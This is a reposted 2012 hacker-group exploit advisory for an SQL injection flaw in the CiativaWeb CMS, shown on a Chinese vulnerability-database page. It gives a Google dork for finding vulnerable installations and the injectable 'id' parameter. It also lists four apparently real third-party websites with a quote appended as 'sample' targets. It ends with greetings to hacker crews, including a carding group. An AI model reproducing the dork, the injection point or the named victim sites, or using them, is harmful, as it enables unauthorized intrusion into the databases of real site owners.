CiativaWeb SQL Injection

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1047323 漏洞类型
发布时间 2012-06-09 更新时间 2012-06-09
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012060093
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0      _                   __           __       __                      1
 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 1                   \ \____/ >> Exploit database separated by exploit    0
 0                    \/___/          type (local, remote, DoS, etc.)     1
 1                                                                        1
 0   [x] Official Website: http://www.1337day.com                         0
 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
 0                                                                        0
 1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              1
 0                I'm NuxbieCyber Member From Inj3ct0r TEAM               1
 1                $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$              0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1

 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
           CiativaWeb - SQL Injection Vulnerability          
 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 ./Title Exploit : CiativaWeb - SQL Injection Vulnerability
 ./CMS Developer : CiativaWeb - www.criativawebdesign.com
 ./Google Dork   : inurl:"/index.php?acess=" &id=
 ./Author Exploit: [ TheCyberNuxbie ]
 ./Time & Date   : June, 07 2012. 01:16 PM.
 ./Category XPL  : [ WebApps/ZeroDay ]
 ./Security Risk : High Level.
 ./Exploit Tested: Back|Track 5.
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

 - Use it at your risk,,,
 This was written for educational purpos,,,
 Author will be not responsible for any damage. //nuxbie

 [0x01] SQL injection is a code injection technique that exploits a security
 vulnerability occurring in the database layer of an #application.
 The vulnerability is present when user input is either incorrectly
 filtered for string literal escape characters embedded in SQL #statements
 or user input is not strongly typed and thereby unexpectedly executed.

 - Affected items (SQLi):
 http://127.0.0.1/webapps/index.php?acess=xxx&id=[SQLi]

 - Sample WebApps Vuln (SQLi):
 http://allikon.com.br/index.php?acess=5&id=7' + [SQL Injection]
 http://tempoextra.com/index.php?acess=5&id=54' + [SQL Injection]
 http://acessocar.com.br/index.php?acess=5&id=6' + [SQL Injection]
 http://aplik.ind.br/site/index.php?acess=6&id=10' + [SQL Injection]
 , And Many More @portofolio_webdevelop...!!!

 - Special Thanks:
 ...:::' 1337day - Inj3ct0r TEAM ':::...
 BoSs r0073r & All 31337 Member Inj3ct0r TEAM,,,
 , And All Inj3ct0r Fans & All Hacktivist,,,

 #############################################################################
 [ Inj3ct0r | PacketStromSecurity | Exploit-ID | Devilzc0de | SekuritiOnline ]
 [ Codenesia | ID-BackTrack | IndonesianCoder | IndonesianHacker | JatimCrew ]
 [ E-C-H-O | ExploreCrew | Hacker-Newbie | Jasakom | YogyaCarderLink ./etc.. ]
 -----------------------------------------------------------------------------
 [ r0073r, Sid3^effects, r4dc0re, CrosS, SeeMe, indoushka, KnocKout, ZoRLu   ]
 [ anT!-Tr0J4n, KedAns-Dz, Kalashinkov3, Angel Injection, cr4wl3r, cyberlog  ]
 [ erytronic, team_elite, r4h0x, Hmei7, kaMtiEz, cyberbagor, SeekerUnZero    ]
 [ Dencowbie, Alex_Maxs, Afni Ramadhania, And All My Friends @it-underground ]
               -=[ We Are c0d3rs And We Are An Exploit...!!! ]=-              
 #############################################################################